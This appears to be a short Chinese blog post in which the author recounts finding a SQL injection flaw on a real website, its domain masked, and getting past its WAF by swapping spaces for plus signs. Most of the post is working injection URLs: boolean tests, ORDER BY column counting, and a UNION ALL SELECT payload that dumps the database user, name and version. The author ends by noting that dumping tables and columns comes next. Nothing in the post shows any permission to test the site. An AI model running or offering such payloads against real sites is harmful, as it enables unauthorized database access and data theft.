- 偶然看到一个网站存在sql注入,但是有waf,随手测试就绕过了,很简单的绕过姿势。(全程打马)
http://www.ooxx.com/news_blank.php?id=297 and 1=1

- 很明显语句被拦截了
http://www.ooxx.com/news_blank.php?id=297+and+1=1

http://www.ooxx.com/news_blank.php?id=297+and+1=2

-
判断出此处确定存在sql注入,接下来就是猜解列数 order by
-
利用二分法 order by 11正常,order by 12错误,存在11个字段


- 然后进行联合查询
http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11

- 箭头指向的就是爆出的显示位
http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),9,10,11

成功爆出数据库,接下来爆表,爆列,字段。。。。。

网友评论